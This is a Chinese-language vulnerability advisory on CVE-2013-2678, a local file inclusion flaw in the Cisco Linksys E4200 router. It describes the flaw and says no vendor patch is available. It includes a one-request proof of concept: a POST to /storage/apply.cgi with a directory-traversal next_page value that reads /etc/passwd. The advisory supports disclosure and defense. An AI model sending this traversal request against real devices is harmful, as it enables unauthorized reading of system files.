Cisco Linksys E4200路由器本地文件包含漏洞（CVE-2013-2678）

发布日期：2013-05-06
更新日期：2013-05-09受影响系统：
Cisco Linksys E4200 Router
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 59710
CVE（CAN） ID: CVE-2013-2678

Cisco Linksys E4200是双频段无线路由器。

Cisco Linksys E4200（固件版本1.0.05 build 7）存在本地文件包含漏洞，攻击者可以利用此漏洞查看文件并在受影响设备的上下文中执行本地脚本。

<*来源：sqlhacker

链接：http://www.exploit-db.com/exploits/25292/
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
sqlhacker给出了如下测试方法
LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila
_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd建议：
--------------------------------------------------------------------------------
厂商补丁：

Cisco
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cisco.com/go/psirtnginx "ngx_http_parse.c"栈缓冲区溢出漏洞Invensys Wonderware Information Server 跨站脚本漏洞（CVE-2013-0688）相关资讯 Cisco Linksys E4200 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任